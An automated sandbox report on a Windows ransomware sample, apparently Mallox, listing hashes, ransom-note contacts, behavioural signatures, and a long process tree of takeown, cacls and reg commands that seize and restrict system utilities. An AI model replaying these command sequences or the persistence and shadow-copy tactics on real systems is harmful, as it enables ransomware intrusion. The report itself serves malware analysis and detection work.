Analysis
max time kernel: 188s
max time network: 211s
platform: windows7_x64
resource: win7-20221111-en
resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
submitted: 29-11-2022 18:19

Static task: static1
Behavioral task: behavioral1 (sample: a-Skjkmfvbkv.bin.exe; resource: win7-20221111-en)
Behavioral task: behavioral2 (sample: a-Skjkmfvbkv.bin.exe; resource: win10v2004-20221111-en)

General
Target: a-Skjkmfvbkv.bin.exe
Size: 12KB
MD5: 8383ef681ba9f25dd7bf49c28cef559e
SHA1: 12ddeb7c5e504dfbbf194842feb86662c170a8f1
SHA256: 193d2c92560adcc08eaf3157673b1f835ae85c5c74679cac587e753f67b33dcf
SHA512: 6ef606af88c235f21868f3e9d8ade4e3eb76308559f54ee2501b6302031bc635d68edd0a23de65a7e7590264827fdff1a4ac7e95d5327bc10fb4839397380af4
SSDEEP: 384:pUR3OFfFLM89kDKyfjDWwYWxptYcFmVc03K:OOFhv9k28ttYcFmVc6K
Malware Config
Extracted from C:\FILE RECOVERY.txt:
- mallox.resurrection@onionmail.org
- http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin
- http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion
Signatures
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Stops running service(s) (3 TTPs)
- Modifies file permissions (1 TTPs, 18 IoCs)
  Processes: takeown.exe, 18 instances (PIDs 1552, 1688, 1856, 1932, 1748, 1992, 1572, 1920, 1272, 1944, 1932, 1304, 2024, 920, 560, 520, 1548, 1404)
- Adds Run key to start application (2 TTPs, 1 IoCs)
  Process: a-Skjkmfvbkv.bin.exe
  Set value (str): \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run\Zitfq = "\"C:\\Users\\Admin\\AppData\\Roaming\\Egosmitqdu\\Zitfq.exe\""
- Enumerates connected drives (3 TTPs, 24 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Process: a-Skjkmfvbkv.bin.exe
  File opened (read-only): \??\A:, \??\B:, \??\E:, \??\F:, \??\G:, \??\H:, \??\I:, \??\J:, \??\K:, \??\L:, \??\M:, \??\N:, \??\O:, \??\P:, \??\Q:, \??\R:, \??\S:, \??\T:, \??\U:, \??\V:, \??\W:, \??\X:, \??\Y:, \??\Z:
- Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Flow 9: api.ipify.org
- Suspicious use of SetThreadContext (1 IoCs)
  PID 576 (a-Skjkmfvbkv.bin.exe) set thread context of PID 1768 (a-Skjkmfvbkv.bin.exe)
- Drops file in Program Files directory (64 IoCs)
- Launches sc.exe (64 IoCs)
  sc.exe is a Windows utility to control services on the system.
  Processes: sc.exe, 64 instances (PIDs 568, 1512, 1628, 1548, 1612, 1568, 700, 1796, 1552, 1288, 296, 636, 1540, 1204, 1128, 700, 1836, 1344, 636, 996, 1952, 1344, 1088, 1952, 976, 1628, 692, 320, 268, 1460, 576, 608, 1980, 2032, 1188, 1536, 2032, 1924, 1404, 640, 576, 1188, 1088, 700, 1576, 608, 1924, 1816, 588, 580, 920, 1628, 564, 580, 960, 1116, 1536, 920, 560, 608, 692, 1492, 1560, 1932)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Interacts with shadow copies (2 TTPs, 1 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Process: vssadmin.exe (PID 1200)
- Kills process with taskkill (26 IoCs)
  Processes: taskkill.exe, 26 instances (PIDs 872, 1796, 636, 872, 1796, 1540, 640, 1568, 1572, 520, 1792, 636, 1512, 1540, 1512, 1408, 636, 2036, 1532, 2040, 636, 1628, 1572, 2040, 976, 1272)
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes: powershell.exe (PID 320), a-Skjkmfvbkv.bin.exe (PID 1768)
- Suspicious use of AdjustPrivilegeToken (41 IoCs)
  Token: SeDebugPrivilege: powershell.exe (PID 320); a-Skjkmfvbkv.bin.exe (PIDs 576, 1768); taskkill.exe (PIDs 1792, 1572, 636, 1512, 872, 1796, 2040, 1540, 1532, 636, 1512, 872, 1796, 2040, 1540, 1408, 636, 976, 640, 1568, 1572, 1628, 1272, 520, 636, 2036)
  Token: SeTakeOwnershipPrivilege: takeown.exe (PIDs 1992, 1404, 1552, 2024, 920, 1688, 1572, 1548); a-Skjkmfvbkv.bin.exe (PID 1768)
  Token: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege: vssvc.exe (PID 952)
- Suspicious use of WriteProcessMemory (64 IoCs)
  Each source wrote to the target four times:
  PID 576 (a-Skjkmfvbkv.bin.exe) wrote to memory of PID 320 (powershell.exe)
  PID 576 (a-Skjkmfvbkv.bin.exe) wrote to memory of PID 1080 (cmd.exe)
  PID 1080 (cmd.exe) wrote to memory of PID 1568 (reg.exe)
  PID 1080 (cmd.exe) wrote to memory of PID 1992 (takeown.exe)
  PID 1080 (cmd.exe) wrote to memory of PID 1164 (cmd.exe)
  PID 1080 (cmd.exe) wrote to memory of PID 844 (cacls.exe)
  PID 1080 (cmd.exe) wrote to memory of PID 1124 (cmd.exe)
  PID 1080 (cmd.exe) wrote to memory of PID 1924 (cacls.exe)
  PID 1080 (cmd.exe) wrote to memory of PID 852 (cmd.exe)
  PID 1080 (cmd.exe) wrote to memory of PID 2012 (cacls.exe)
  PID 1080 (cmd.exe) wrote to memory of PID 932 (cmd.exe)
  PID 1080 (cmd.exe) wrote to memory of PID 1616 (cacls.exe)
  PID 1080 (cmd.exe) wrote to memory of PID 1016 (cmd.exe)
  PID 1080 (cmd.exe) wrote to memory of PID 1980 (cacls.exe)
  PID 1080 (cmd.exe) wrote to memory of PID 1632 (cmd.exe)
  PID 1080 (cmd.exe) wrote to memory of PID 1636 (cacls.exe)
- System policy modification (1 TTPs, 1 IoCs)
  Process: a-Skjkmfvbkv.bin.exe
  Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0"
Processes
Each entry is image path: command line; the bracketed number is the depth in the process tree (1 = sample, 2 = child, 3 = grandchild). Signatures triggered by a process are listed beneath it.
- [1] C:\Users\Admin\AppData\Local\Temp\a-Skjkmfvbkv.bin.exe: "C:\Users\Admin\AppData\Local\Temp\a-Skjkmfvbkv.bin.exe"
  signatures: Adds Run key to start application; Suspicious use of SetThreadContext; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe: "powershell" Get-Date
    signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\SysWOW64\cmd.exe: cmd /c ""C:\Users\Admin\AppData\Local\Temp\Ksifbwxmmfbgnkill$-arab.bat" "
    signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\reg.exe: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
    - [3] C:\Windows\SysWOW64\takeown.exe: takeown /f C:\Windows\system32\cmd.exe /a
      signatures: Modifies file permissions; Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\cmd.exe /g Administrators:f
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\cmd.exe /e /g Users:r
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\cmd.exe /e /d SERVICE
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\cmd.exe /e /d "network service"
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\cmd.exe /e /g system:r
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
    - [3] C:\Windows\SysWOW64\takeown.exe: takeown /f C:\Windows\SysWOW64\cmd.exe /a
      signatures: Modifies file permissions
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    - [3] C:\Windows\SysWOW64\takeown.exe: takeown /f C:\Windows\system32\net.exe /a
      signatures: Modifies file permissions; Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net.exe /g Administrators:f
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net.exe /e /g Users:r
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net.exe /e /g Administrators:r
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net.exe /e /d SERVICE
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net.exe /e /d mssqlserver
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net.exe /e /d "network service"
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net.exe /e /d system
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
    - [3] C:\Windows\SysWOW64\takeown.exe: takeown /f C:\Windows\SysWOW64\net.exe /a
      signatures: Modifies file permissions
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net.exe /e /d system
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    - [3] C:\Windows\SysWOW64\takeown.exe: takeown /f C:\Windows\system32\net1.exe /a
      signatures: Modifies file permissions; Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net1.exe /g Administrators:f
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net1.exe /e /g Users:r
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net1.exe /e /g Administrators:r
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net1.exe /e /d SERVICE
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net1.exe /e /d mssqlserver
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net1.exe /e /d "network service"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net1.exe /e /d system
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress
    - [3] C:\Windows\SysWOW64\takeown.exe: takeown /f C:\Windows\SysWOW64\net1.exe /a
      signatures: Modifies file permissions
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net1.exe /e /g Users:r
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net1.exe /e /d system
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    - [3] C:\Windows\SysWOW64\takeown.exe: takeown /f C:\Windows\system32\mshta.exe /a
      signatures: Modifies file permissions; Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\mshta.exe /g Administrators:f
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\mshta.exe /e /g Users:r
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\mshta.exe /e /g Administrators:r
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\mshta.exe /e /d SERVICE
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\mshta.exe /e /d mssqlserver
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\mshta.exe /e /d "network service"
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\mshta.exe /e /d system
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress
    - [3] C:\Windows\SysWOW64\takeown.exe: takeown /f C:\Windows\SysWOW64\mshta.exe /a
      signatures: Modifies file permissions
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\mshta.exe /e /d system
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    - [3] C:\Windows\SysWOW64\takeown.exe: takeown /f C:\Windows\system32\FTP.exe /a
      signatures: Modifies file permissions; Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\FTP.exe /g Administrators:f
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\FTP.exe /e /g Users:r
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\FTP.exe /e /g Administrators:r
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\FTP.exe /e /d SERVICE
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\FTP.exe /e /d mssqlserver
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\FTP.exe /e /d "network service"
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\FTP.exe /e /d system
    - [3] C:\Windows\SysWOW64\cmd.exe: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    - [3] C:\Windows\SysWOW64\cacls.exe: cacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\FTP.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\wscript.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\wscript.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d system3⤵
-
